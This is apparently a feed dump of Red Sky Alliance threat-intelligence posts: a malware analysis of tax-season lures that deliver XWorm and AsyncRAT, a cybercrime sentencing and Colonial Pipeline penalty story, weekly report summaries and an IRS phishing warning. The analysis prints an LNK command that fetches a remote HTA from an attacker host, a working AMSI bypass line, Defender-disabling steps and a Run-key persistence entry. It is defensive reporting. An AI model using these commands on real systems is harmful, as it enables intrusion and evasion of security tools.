irs - X-Industry - Red Sky Alliance2024-03-28T20:57:07Zhttps://redskyalliance.org/xindustry/feed/tag/irsTax Time 2023https://redskyalliance.org/xindustry/tax-time-20232023-04-14T16:30:00.000Z2023-04-14T16:30:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}11028083890,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}11028083890,RESIZE_400x{{/staticFileLink}}" alt="11028083890?profile=RESIZE_400x" width="250" /></a>It is tax time again in the US. And that means scammers are out there trying to steal your information. Targeting calendar-based events enables threat actors to prepare ahead of time and have a new selection of targets on rotation. This report covers a few examples of malware that take advantage of tax season. Although such attacks may seem repetitive to the casual observer, threat actors would not continue to target taxpayers if previous attacks had not been successful. And they were.<a href="#_ftn1">[1]</a></p>
<p>XWorm Delivered Through Tax Scam </p>
<p>Researchers became aware of a curious-looking archive file hosted on an open directory on: www[.]farmaciasmv[.]com/citrix/2022%20tax_documents[.]zip, which has since been removed.</p>
<p><br /> <a href="{{#staticFileLink}}11028084080,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028084080,RESIZE_400x{{/staticFileLink}}" alt="11028084080?profile=RESIZE_400x" width="400" /></a><em>Figure 1. Empty open directory that hosted 2022%20tax_documents[.]zip</em></p>
<p>The zip file contains the following files:</p>
<p>Annual Withdrawal.xlsx (SHA2: 59bb292565ebc86800e5e4d625d3c19f98afe2261d3da1a8e2f9b45ec76153a0)</p>
<p>Robert tax_docs.pdf (SHA2: a9f4b054ea128529c62a8ff25f1439651f045e443adf5ff11fb5bd29f1333a7a)</p>
<p><em><a href="{{#staticFileLink}}11028084286,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028084286,RESIZE_584x{{/staticFileLink}}" alt="11028084286?profile=RESIZE_584x" width="500" /></a>Figure 2. Contents of the 2022%20tax_documents[.]zip</em></p>
<p>The XLSX file is a benign decoy file that contains financial data from an unknown source.</p>
<p><em><a href="{{#staticFileLink}}11028084669,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028084669,RESIZE_584x{{/staticFileLink}}" alt="11028084669?profile=RESIZE_584x" width="500" /></a>Figure 3. Contents of the Annual Withdrawal.xlsx</em></p>
<p>The other file is malicious. Despite Robert tax_docs.pdf having a PDF icon, it is different from what it seems. The file is actually a link (LNK) file that launches the legitimate script (C:\Windows\System32\SyncAppvPublishingServer.vbs), which has a known issue of taking command line arguments. The link file exploits this issue and feeds the legitimate script with the following command line argument to download and execute a remote “note.hta”:</p>
<p>;\W_\*2\\\m_h_a_e ('http'+'://datacenter002[.]myftp[.]biz/documents/note.'+'hta')</p>
<p>Copy</p>
<p>The downloaded note.hta uses PowerShell to download another remote file hosted on hxxp://datacenter002[.]myftp[.]biz/documents/note[.]gif, which was not available at the time of our investigation. Finding another note.gif (SHA2: 0487ef401345aa17c6aaeac23151219863e1363f82fe76edd0066bbf3fb07715) based on the same infection chain let us continue our quest to the payload.</p>
<p>note.gif is a PowerShell script that creates the following files:</p>
<p>C:\Users\Public\onedrive.vbs (SHA2: 92C1767EE4A954B93D6AFA9AE83FE82B82D2867D919D0359DCF2C8DA75FB8C7C)</p>
<p>C:\Users\Public\test.vbs (SHA2: ADBA59F1495965684EEB4C5DAAD67F732FEB5E9183AE05EB869E20C88CAD7327)</p>
<p>C:\Users\Public\onedrive.ps1 (SHA2: 7A9705A424A634A321DB9F36B61D74B953A44D44EDC429F7641BF830870572FC)</p>
<p>Once launched, it executes the onedrive.vbs and test.vbs files.</p>
<p>test.vbs creates %usertemp%\Note.txt, a clean file containing fake "QUARTERLY TAX PAYMENTS FOR 2022" data.</p>
<p><em><a href="{{#staticFileLink}}11028085057,RESIZE_400x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028085057,RESIZE_400x{{/staticFileLink}}" alt="11028085057?profile=RESIZE_400x" width="350" /></a>Figure 4. Note.txt containing fake “QUARTERLY TAX PAYMENTS FOR 2022” data</em></p>
<p>onedrive.vbs runs the previously created onedrive.ps1 filled with activities designed to hamper Windows Defender. It first executes the following known AMSI (Antimalware Scripting Interface) bypass:</p>
<p>[Ref].Assembly.GetType(‘System.Management.Automation.AmsiUtils’)</p>
<p>.GetField(‘amsiInitFailed’,’NonPublic,Static’).SetValue($null,$true)</p>
<p>Copy</p>
<p>It also disables AMSI by hijacking the COM server, changing it from "%windir%\system32\amsi.dll" to "C:\IDontExist.dll". The PowerShell script then performs the following actions to alter Windows Defender settings:</p>
<p>Adds the following exclusions to Windows Defender</p>
<p>Extensions: .bat, .ppam, .xls, .docx, .bat, .exe, .vbs, .js</p>
<p>File paths: C:\, D:\, E:\</p>
<p>Processes: explorer.exe, kernel32.dll, aspnet_compiler.exe, cvtres.exe, CasPol.exe, csc.exe, Msbuild.exe, ilasm.exe, InstallUtil.exe, jsc.exe, Calc.exe, powershell.exe, rundll32.exe, conhost.exe, Cscript.exe, mshta.exe, cmd.exe, DefenderisasuckingAntivirus, wscript.exe</p>
<p>Allows known Windows Defender Threat IDs to execute.</p>
<p>Disables Windows Defender Attack Surface Reduction (ASR) rules.</p>
<p>Disables the following Windows Defender features:</p>
<ul>
<li>Intrusion Prevention System</li>
<li>IO AV Protection (does not scan downloaded files and attachments)</li>
<li>Realtime monitoring</li>
<li>Script scanning</li>
<li>Controlled folder access protection</li>
<li>PUA protection</li>
<li>Scheduled scan</li>
<li>Sets Network Protection to audit mode in Windows Defender (allows users to visit known malicious sites but logs them in the event log)</li>
<li>Disables MAPS (Microsoft Active Protection Service) reporting</li>
<li>Never submits samples to Microsoft</li>
<li>Allows severe/high/moderate/low-level threats to execute</li>
<li>Disables the "administrator in Admin Approval Mode" user type (disables UAC prompts)</li>
<li>Stops the WinDefend service (Windows Defender)</li>
<li>Disables the startup of the WinDefend service</li>
<li>Deletes the WinDefend service</li>
<li>Creates a user named "System32" with the password “123” (no quotes)</li>
<li>Adds the System32 user to both the "administrators" group and the "Remote Desktop Users" group</li>
<li>Stops the Microsoft Defender Antivirus Network Inspection Service (WdNisSvc)</li>
<li>Turns off Windows Firewall</li>
<li>The PowerShell script finally uses reflective loading to load a binary into memory that injects XWorm RAT version 3.1.</li>
</ul>
<p>Furthermore, we discovered other files that follow a similar attack pattern; “Mary tax docs.pdf.lnk” (SHA2: 6dee21d581eac2214e3ea7259bf9cb3e0cc31b442a372ffba00f82aa858050f0) and “Wilson tax_docs.pdf.lnk” (SHA2: c06cf72149d52b8a7c73b38c075156df4c458f633c3031c3c0ce32741ad1518e) that were used in March 2023. As with the attack mentioned previously, these link files are disguised as PDF files to fool potential victims into opening them.</p>
<p>“Mary tax docs.pdf.lnk”, along with another clean Microsoft Office file, “R&P Sales Summary.docx”, are included in an archived file labeled “2022 tax docs.zip”. Running the link file triggers the download and execution of “doc.pdf” from “hxxp://datacenter11[.]myftp[.]org/notepad/”. The “doc.pdf” is actually a VBA file that uses PowerShell to pull and run “hxxp://datacenter11[.]myftp[.]org/met/a[.]mp3”. While the “a.mp3” is not available for investigation, OSINT (Open Source Intelligence) indicates that the XWorm malware is likely delivered to the victim’s machine.</p>
<p>XWorm</p>
<p>From the evidence that researchers accumulated during our research, we have high confidence that the 2022%20tax_documents[.]zip file we initially analyzed delivers the XWorm.</p>
<p>XWorm is a commodity RAT (Remote Access Trojan) reportedly sold in underground forums for $30 to $150. XWorm supports typical RAT functions, such as taking screenshots, keylogging, and taking control of a compromised machine by abusing Virtual Network Computing (VNC), a technique infamously known as Hidden VNC (HVNC). XWorm can also encrypt files, essentially acting in a similar fashion to ransomware.</p>
<p>Below are screenshots of a recently cracked version of XWorm v3.1:</p>
<p><em><a href="{{#staticFileLink}}11028085084,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028085084,RESIZE_584x{{/staticFileLink}}" alt="11028085084?profile=RESIZE_584x" width="500" /></a>Figure 5. Leaked cracked version of XWorm v3.1</em></p>
<p> <br /> <a href="{{#staticFileLink}}11028085458,RESIZE_400x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028085458,RESIZE_400x{{/staticFileLink}}" alt="11028085458?profile=RESIZE_400x" width="367" /></a><em>Figure 6. Some of the functionalities supported by XWorm v3.1</em></p>
<p><em><a href="{{#staticFileLink}}11028085476,RESIZE_400x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028085476,RESIZE_400x{{/staticFileLink}}" alt="11028085476?profile=RESIZE_400x" width="266" /></a>Figure 7. Download page of the cracked version of XWorm v.3.1</em></p>
<p>Going back to the first example, “2022%20tax_documents[.]zip”, we found that it was hosted on the open directory “www[.]farmaciasmv[.]com/citrix/”. Analysts also found another page on the same domain likely used for phishing hxxp://farmaciasmv[.]com/sharefile/citrix/2022%20taxes[.]html. The files involved in this attack were submitted to VirusTotal. Researchers don’t believe victims just wander into such malicious sites by accident. Based on our experience, they were likely lured via malicious links in spam emails.</p>
<p>Manual interactions are required up until the files inside the zip file are extracted, and the link file is manually run. The basic security practice of not opening files from unknown sources can prevent infection and the damages that follow.</p>
<p>Dual Malware Wielding:</p>
<p>Another tax-related attack researchers came across is an image file named “TaxReturn2022.img” (SHA2: 6658d4b14f0093a2fccd2f57b5bf9fa18d09cda5d42036f280b41e5beb1ff2fe) that contains the following files:</p>
<p>TaxReturn2022.pdf.lnk (SHA2: 180a79cff5ef91ecd744a35b2e433d0a4aae0e4d3b87c40e8e51f5ca02aac4d6)</p>
<p>TaxReturns2022.pdf.lnk (SHA2: fa862d43a85a9ea6f046f3edc743b897bba86348c04b8d62ba6eb27f951edf55)</p>
<p>TaxReturns2022.zip (SHA2: c4599d4270ba8ef58fb8f1219ecff864acd83145c368ada9406a341d6f4a4fbf)</p>
<p>We were able to locate another file, “TaxReturns2022.iso” (SHA2: bb7138a106ee2e0a384896316679c750e3287b51fc16a5e65ccd1e44911162d6), that contains identical files.</p>
<p><em><a href="{{#staticFileLink}}11028085695,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028085695,RESIZE_584x{{/staticFileLink}}" alt="11028085695?profile=RESIZE_584x" width="500" /></a>Figure 8. Contents of TaxReturn2022.img</em></p>
<p><em><a href="{{#staticFileLink}}11028086255,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028086255,RESIZE_584x{{/staticFileLink}}" alt="11028086255?profile=RESIZE_584x" width="500" /></a>Figure 9. Contents of TaxReturns2022.iso</em></p>
<p>Unfortunately, the infection vector for both files has not been identified, but the likely attack avenue is an email containing malicious attachments and links. The TaxReturns2022.zip file within both archives is password-protected with an unknown password, and its contents cannot be extracted.</p>
<p>As with the previous example, “TaxReturn2022.pdf.lnk” has a PDF icon. However, it’s a link (shortcut) file, as seen in Figure 4. </p>
<p>Manually executing the lnk file triggers the download of wed.hta from hxxp://179.43.175[.]187/pqpf/ and saves it as %USERAPPDATA%\wed.hta (SHA2: 0cbaf95b9d4df27442d753dc4cb600eda0a7ecb95e4071f380f69f5f3c89adb1). <br /> The downloaded file is an HTA web file containing VBScript code for the next action and a lot of junk code. It eventually runs:</p>
<p>powershell.exe -ExecutionPolicy UnRestricted [powershell code</p>
<p>Copy</p>
<p>This PowerShell code is designed to execute whatever was downloaded. In this case, it downloads “TaxReturn2022.pdf” from hxxp://179.43.175[.]187/pqpf/, saves it as %USERAPPDATA%\TaxReturn2022.pdf, and opens it. Unfortunately, this PDF file is a clean decoy file that also requires an unidentified password to open.</p>
<p>The PowerShell code sets the following registry entry to open the downloaded PDF file every time the computer boots and adds the HIDDEN file attribute to the file:</p>
<p>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\iXqrVo = [location of downloaded PDF file]</p>
<p>Copy</p>
<p>This behavior led us to believe that the threat actor behind this attack relies on templates and uses them without really knowing what they are because there is no valid reason to open a decoy PDF file at every startup, and adding the HIDDEN file attribute is usually reserved for executables and DLLs.</p>
<p>The script then sleeps five seconds before downloading and executing whatever has been downloaded. In this case, it downloads TCywxTOvZk.wsf from hxxp://[redacted].67[.]12:222/ and saves it as %USERAPPDATA%\TCywxTOvZk.wsf (SHA2: 351b0514feaa6a2fc21af25ad7c6c9bed93e38ef896d3fb6c8633924d8615e2d). Note that part of the IP address masked as the directory is accessible.</p>
<p>TCywxTOvZk.wsf has only three meaningful lines of code out of almost 2840 lines and downloads and runs hxxp://[redacted].67[.]12:222/no[.]txt (SHA2: d7c63c4d488918aa09fcbd2012d041ed440377af51a87e757c40df3725b1eb07). no.txt contains VBScript code that downloads and executes hxxp://[redacted].67[.]12:222/j[.]png (SHA2: 460d093a55b930e733c60575f82183cd0edd52ec6b927cdb4a93dc5da7f0ac9c), which is a PowerShell script that creates the following files:</p>
<p>C:\ProgramData\Document\py.ps1</p>
<p>C:\ProgramData\schtasks\Microsoft.bat</p>
<p>C:\ProgramData\Document\x.ps1</p>
<p>The script then runs Microsoft.bat, which uses MSHTA.exe to run PowerShell code to run py.ps1. The .ps1 file contains two PE files (stored in $apprun and $appme). It uses 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' to reflectively load $apprun, which then loads $appme, which was identified as an ASync RAT variant that connects to the attacker’s Command-and-Control (C2) server located at nulled2nd[.]camdvr[.]org:6666.</p>
<p>We also found another .lnk file (SHA2: c0a59b28919282b3c45a9619410ea95e35f86dbf43266e6f9a25b94f5948018b) hidden in TaxReturns2022.pdf.iso (SHA2: ee1299f4e56c7f5af243df63192f1c7574152c0600edc49c37b9f8b703da02f2).</p>
<p>This link file goes through the same infection chain as the previous one:</p>
<ul>
<li>The link file downloads and executes hxxp://[redacted].67[.]12:222/xa[.]hta</li>
<li>xa[.]hta downloads and executes hxxp://[redacted].67[.]12:222/qDxcmqPPmI[.]wsf</li>
<li>wsf was not available at the time of the investigation. However, OSINT led us to find the next action.</li>
<li>qDxcmqPPmI[.]wsf downloads and executes hxxp://[redacted].67[.]12:222/no[.]txt</li>
<li>no[.]txt downloads and executes hxxp://[redacted].67[.]12:222/j[.]png</li>
<li>png creates py.ps1 and x.ps1. It also creates and runs Microsoft.bat</li>
<li>bat runs py.ps1, which eventually installs Async RAT on the compromised machine</li>
</ul>
<p>The attacker left the hosting location of the malicious files wide open.</p>
<p><em><a href="{{#staticFileLink}}11028086075,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028086075,RESIZE_584x{{/staticFileLink}}" alt="11028086075?profile=RESIZE_584x" width="485" /></a>Figure 10. Files hosted on the attacker’s open directory</em></p>
<p>The directory contains a few files whose names are associated with Adobe Acrobat Reader DC. This indicates that the threat actor also leverages Adobe as a lure to install the AsyncRAT variant.</p>
<p>readerdc64_en_l_cra_mdr_install_update.exe[.]lnk (SHA2: 653fcea661d8f7d996210dcdbcad110f0dcca8e7bbc906bb0a4d12e3ab674483)</p>
<p>readerdc64_en_l_cra_mdr_install_update[.]exe (SHA2: 1b012d01c86be5d68959504d362c52170b27d726cf2943e2e0250506a29c765a) – this is a legitimate Adobe Acrobat Reader DC installer.</p>
<p>reader64[.]hta (SHA2: 3b2e776ab44a711a52de88b02c007897eed137b62ecc7fb51bbb3089941bda1a)</p>
<p>readerdc64_en_ka_cra_mdr_install_update[.]wsf (SHA2: d2f0995f9184170386360d5eb5990e38a289052e6a15706613c9568a207da7d7)</p>
<p>AsyncRAT contains features designed to steal information from compromised machines and a clipper feature that monitors the clipboard for crypto wallet address swapping, which means victims may end up paying more than their taxes.</p>
<table width="100%">
<tbody>
<tr>
<td>
<p><strong>Affected Platforms: Windows</strong></p>
<p><strong>Impacted Users: Windows users</strong></p>
<p><strong>Impact: Compromised machines are under the control of the threat actor, potentially resulting in stolen personally identifiable information (PII), credential theft, financial loss, etc.</strong></p>
<p><strong>Severity Level: Medium</strong></p>
</td>
</tr>
</tbody>
</table>
<p>But however potential victims end up with the “TaxReturn2022.img” and “TaxReturns2022.pdf.iso” files on their system, users still need to manually mount them and run the fake PDFs to trigger the infection chain. A little caution can go a long way toward protecting yourself against tax-related malware.</p>
<p>Conclusion: The attacks covered in this blog are the tip of the iceberg. Attackers make every attempt to scam taxpayers for financial gain and data exfiltration for future attacks. In the end, those looking to save a dime, in this case, from the IRS, often find that greed endangers them in the cyber world.</p>
<p>For additional information, please refer to the “<a href="https://www.irs.gov/newsroom/tax-scams-consumer-alerts">Tax Scams/Consumer Alerts</a>” alert issued by the IRS for other tips on protecting yourself from tax-related scams.</p>
<p>IOCs below:</p>
<p><a href="{{#staticFileLink}}11028086455,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028086455,RESIZE_584x{{/staticFileLink}}" alt="11028086455?profile=RESIZE_584x" width="500" /></a>Network IOCs</p>
<p><a href="{{#staticFileLink}}11028086657,RESIZE_710x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}11028086657,RESIZE_584x{{/staticFileLink}}" alt="11028086657?profile=RESIZE_584x" width="500" /></a>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization and we would like to thank Sentinel Labs with this great report. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance. com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www. redskyalliance. org/ </li>
<li>Website: https://www. wapacklabs. com/ </li>
<li>LinkedIn: https://www. linkedin. com/company/64265941 </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.fortinet.com/blog/threat-research/tax-scammers-at-large?lctg=141970831">https://www.fortinet.com/blog/threat-research/tax-scammers-at-large?lctg=141970831</a></p></div>Cyber Justicehttps://redskyalliance.org/xindustry/cyber-justice2022-05-12T17:29:42.000Z2022-05-12T17:29:42.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}10482539655,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10482539655,RESIZE_400x{{/staticFileLink}}" width="250" alt="10482539655?profile=RESIZE_400x" /></a>Three people were handed years-long sentences in federal court on Wednesday for a range of crimes connected to a widespread hacking and identity theft campaign. Alessandro Doreus, Jean Elie Doreus Jovin and Djouman Doreus pleaded guilty to conspiracy to commit fraud and aggravated identity theft in September 2021. Prosecutors said they defrauded hundreds of people from 2015 to 2020 by gaining access to Social Security numbers, account numbers, usernames and passwords.</p>
<p>A US District Judge gave 29-year-old Florida resident Alessandro Doreus and 34-year-old Georgia resident Jovin sentences of six years and nine months in federal prison. Djouman Doreus, 29 years old and also a Floridian, was handed a five-year sentence. The trio used the stolen information to take out loans, open credit cards and create financial accounts, frequently emailing each other files containing thousands of names, Social Security numbers, and dates of birth. In at least one instance, they used the fraudulently opened credit cards to pay fake vendor accounts that Jovin opened and controlled. They also filed fraudulent tax returns as a way to get refunds from the IRS. Law enforcement found that Jovin purchased stolen credentials on a dark web marketplace that gave him access to computer servers. The Justice Department said Jovin shared these compromised server credentials with Alessandro Doreus.<a href="#_ftn1">[1]</a></p>
<p>These cyber criminals managed to evade law enforcement by opening dozens of email accounts. They were eventually stopped in August 2020 when the FBI executed a search warrant at the home of Alessandro Doreus and found the information of at least 300 people. During the raid, the FBI seized nearly $500,000 that they believe resulted from the group’s scams. “The Doreus trio wrongly assumed that their crimes would be untraceable, hidden under a cloak of Internet anonymity,” said IRS-CI Special Agent in Charge Brian Payne.</p>
<p><a href="{{#staticFileLink}}10482539865,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10482539865,RESIZE_400x{{/staticFileLink}}" width="277" alt="10482539865?profile=RESIZE_400x" /></a></p>
<table width="100%">
<tbody>
<tr>
<td>
<p>Image: FBI IC3</p>
</td>
</tr>
</tbody>
</table>
<p>Nearly $7 billion was lost through internet crimes in 2021, surpassing a record set in 2020 by about $1.7 billion, according to the FBI’s annual Internet Crime Report. The center received 847,376 complaints throughout the year, with most concerning ransomware, business e-mail compromise (BEC) schemes, and the criminal use of cryptocurrency. It represents a 7% increase compared to 2020 and the FBI received an average of more than 2,300 complaints each day. The FBI said BEC crimes led to 19,954 complaints with an adjusted loss of nearly $2.4 billion in 2021. </p>
<p>In regulatory action, the U.S. Department of Transportation's Pipeline and Hazardous Materials Safety Administration (PHMSA) has proposed a penalty of nearly $1 million to Colonial Pipeline for violating federal safety regulations, worsening the impact of the ransomware attack last year. The $986,400 penalty is the result of an inspection conducted by the regulator of the pipeline operator's control room management (CRM) procedures from January through November 2020.<a href="#_ftn2">[2]</a> </p>
<p>The PHMSA said that "a probable failure to adequately plan and prepare for manual shutdown and restart of its pipeline system [...] contributed to the national impacts when the pipeline remained out of service after the May 2021 cyberattack."</p>
<p>Colonial Pipeline, operator of the largest US fuel pipeline, was forced to temporarily take its systems offline in the wake of a DarkSide ransomware attack in early May 2021, disrupting gas supply and prompting a regional emergency declaration across 17 states. The incident also saw the company paying out $4.4 million in ransom to the cybercrime syndicate to regain access to its computer network, although the US government managed to recover a significant chunk of the digital funds paid. "The pipeline shutdown impacted numerous refineries' ability to move refined product, and supply shortages created wide-spread societal impacts long after the restart," PHMSA said in a Notice of Probable Violation and Proposed Compliance Order. Colonial Pipeline's ad-hoc approach toward consideration of a 'manual restart' created the potential for increased risks to the pipeline's integrity as well as additional delays in restart, exacerbating the supply issues and societal impacts."</p>
<p>In response Colonial said, "This notice is the first step in a multi-step regulatory process and we look forward to engaging with PHMSA to resolve these matters," a spokesperson for Colonial Pipeline told media sources, adding that its, "incident command structure facilitates a deliberate approach when responding to events. As the 2021 cybersecurity incident demonstrated, Colonial's approach to operating manually gives us the flexibility and structure necessary to ensure continued safe operations as we adapt to unplanned events. Our coordination with government stakeholders was timely, efficient and effective as evidenced by our ability to quickly restart the pipeline in a safe manner five days after we were attacked, which followed localized manual operations conducted before the official restart."</p>
<p><strong>Justice has many twists and turns</strong>.</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization and wish to share cyber security views from across the Globe. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs. com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www. redskyalliance. org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www. wapacklabs. com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www. linkedin. com/company/64265941</a> </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/hackers-sentenced-florida-georgia-identity-theft-tax-fraud/">https://therecord.media/hackers-sentenced-florida-georgia-identity-theft-tax-fraud/</a></p>
<p><a href="#_ftnref2">[2]</a> <a href="https://thehackernews.com/2022/05/us-proposes-1-million-fine-on-colonial.html">https://thehackernews.com/2022/05/us-proposes-1-million-fine-on-colonial.html</a></p></div>INTELLIGENCE REPORT: EDUCATION / GOVERNMENT SECTORShttps://redskyalliance.org/xindustry/intelligence-report-education-government-sectors2021-04-09T13:04:56.000Z2021-04-09T13:04:56.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><a href="{{#staticFileLink}}8775516300,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8775516300,RESIZE_400x{{/staticFileLink}}" width="250" alt="8775516300?profile=RESIZE_400x" /></a>Activity Summary - Week Ending 9 April 2021:</h2>
<ul>
<li>Red Sky Alliance identified 34,654 connections from new unique IP Addresses</li>
<li>Analysts identified 2,753 new IP addresses participating in various Botnets</li>
<li>Vacar Auto Electronics Co. is Keylogged</li>
<li>Babydraco Webshells</li>
<li>RemRAT Botnet</li>
<li>April 15<sup>th</sup> is Coming - US IRS scams</li>
<li>Accellion and UC</li>
<li>Brown University under attack</li>
<li>EU Government Institutions</li>
<li>PLA Shanghai Police – Hacked files</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}8775516883,original{{/staticFileLink}}">IR-21-099-001_weekly_099_FINAL.pdf</a></p></div>INTELLIGENCE REPORT: MANUFACTURING SECTORhttps://redskyalliance.org/xindustry/intelligence-report-manufacturing-sector2021-04-02T12:47:34.000Z2021-04-02T12:47:34.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><a href="{{#staticFileLink}}8748776293,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8748776293,RESIZE_400x{{/staticFileLink}}" width="250" alt="8748776293?profile=RESIZE_400x" /></a>Activity Summary - Week Ending 2 April 2021:</h2>
<ul>
<li>Red Sky Alliance identified 34,034 connections from new unique IP addresses</li>
<li>Analysts identified 3,876 new IP addresses participating in various Botnets</li>
<li>20 new unique email accounts compromised with Keyloggers were observed this week</li>
<li>Soccer player’s name Berat Can Sonmez is being used to lure Victims</li>
<li>EggShell Malware</li>
<li>New US-IRS Phishing Campaign</li>
<li>WordPress Vulnerabilities</li>
<li>ClearURL and Goggle</li>
<li>Honeywell and Molson Coors Attacked</li>
<li>Manufacturing IT & OT</li>
<li>Cyber-attacks up 207% in New Delhi</li>
<li>Amazon and Unions</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}8748774882,original{{/staticFileLink}}">IR-21-092-001_Manufactweekly_092_FINAL.pdf</a></p></div>Phishing Season Never Endshttps://redskyalliance.org/xindustry/phishing-season-never-ends2021-03-07T19:43:51.000Z2021-03-07T19:43:51.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}8640804469,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}8640804469,RESIZE_400x{{/staticFileLink}}" width="250" alt="8640804469?profile=RESIZE_400x" /></a>As the 2020 tax preparation season begins in the US, the Internal Revenue Service (IRS) is warning that it is seeing more signs of cyber criminals spoofing the agency's domains and incorporating its logos and language into phishing campaigns. Authorities additionally are cautioning other fraud campaigns that spoof US government departments, with some using themes capitalizing on COVID-19 economic relief programs. A tempting lure to many.</p>
<p>During February 2020, the IRS published a notification to tax professionals describing a phishing campaign that spoofs the agency's likeness, with cyber crooks attempting to steal Electronic Filing Identification Numbers. The IRS issues these numbers to individuals or firms that have been approved as authorized IRS e-file providers. In this phishing email scam, the hackers are trying to entice tax preparers to email documents that would disclose their identities and Electronic Filing Identification Numbers. The cyber criminals can then use this information to file fraudulent returns by impersonating the tax professional, the IRS notes.<a href="#_ftn1">[1]</a></p>
<p>The IRS warning notes that swindlers are also impersonating potential clients for tax preparers. This approach has become more effective because more transactions are being remotely conducted due to the COVID-19 pandemic. These phishing emails likely contained a malicious attachment that, when opened, would download malware, such as information stealers designed to record keystrokes or harvest credentials. Besides Electronic Filing Identification Numbers, the fraudsters might attempt to steal tax pros' Preparer Tax Identification Numbers (TIN) or e-services usernames and passwords, according to the IRS.</p>
<p>Cyber criminals are getting better and more proficient at spoofing government domains for their phishing campaigns and incorporating logos and language to give the messages a legitimate appearance, security experts say. </p>
<p>Besides the IRS, other federal agencies have uncovered black hat hackers spoofing their sites, especially as part of fraud campaigns designed to take advantage of federal COVID-19 economic relief programs. As an example, last year the security firm Malwarebytes uncovered a phishing campaign spoofing a US Small Business Administration (SBA) loan offer in an attempt to steal banking credentials and other personal data.</p>
<p>The Financial Industry Regulatory Authority (FINRA) which helps self-regulate brokerage firms and exchange markets in the US, has also warned about fraudsters creating spoofed websites and domains using members' real names and images to steal personal information and credentials. These types of spoofing or phishing campaigns often are launched when new websites are created to support new government benefits programs.</p>
<p>The goal of these campaigns is to steal credentials to gain access to victims' financial accounts or money trying to lure funds away from the target recipient. Once new government benefits programs are established it iss not long before threat actors begin mimicking these sites and are often successful. Often, the threat actor will design their phishing kits with official government logos and website footers to add a level of authenticity.</p>
<p>A May 2020 report from Proofpoint tracked about 300 phishing campaigns that spoofed government domains or incorporated proper language and logos in phishing emails. Many of these malicious campaigns began around the time tax season started last year and during the COVID-19 pandemic. Fraudsters have recently spoofed tax and other government agencies in the UK and Europe as well. This is just not a US problem.</p>
<p>A senior manager with the security firm Lookout, says that their research shows that one in 15 US government workers, federal, state and local have encountered a phishing email or threat in 2020. He also notes that mobile phishing emails have increased 37% in 2020, in part, because fraudsters can buy phishing kits on underground markets. </p>
<p>MediaPRO, a Seattle-based provider of security training theorizes phishing campaigns be better checked due to the recent SolarWinds hack, combined with the current US president's heightened focus on cybersecurity. Experts agree that this will result in higher cyber vigilance within government agencies, and that is good. </p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings: <a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a> </p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a> </li>
</ul>
